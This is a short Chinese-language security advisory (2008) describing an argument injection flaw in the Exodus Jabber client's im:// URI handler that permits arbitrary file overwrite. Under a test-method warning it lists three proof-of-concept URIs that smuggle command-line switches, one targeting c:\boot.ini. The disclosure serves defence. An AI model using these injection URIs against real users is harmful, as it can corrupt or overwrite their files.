安全研究

安全漏洞
Exodus im:// URI处理器命令行参数注入漏洞

发布日期:2008-11-17
更新日期:2008-11-19

受影响系统:
Exodus Exodus 0.10
描述:
BUGTRAQ  ID: 32330

Exodus是用Borland Delphi编写的免费即时消息客户端,可连接到Jabber服务器并与其他Jabber用户通讯。

Exodus客户端错误地相信了通过im:// URI所接收到的参数,如果用户受骗跟随了特制的URI的话就可能导致覆盖系统上的任意文件。

<*来源:strawdog
  
  链接:http://secunia.com/advisories/32729/
        http://milw0rm.com/exploits/7145
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

im:///'%20-?
im:///'%20-l%20c:\boot.ini%20-v
im:///'%20-c%20file:///aaaa%20

建议:
厂商补丁:

Exodus
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://code.google.com/p/exodus/

浏览次数:2518
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障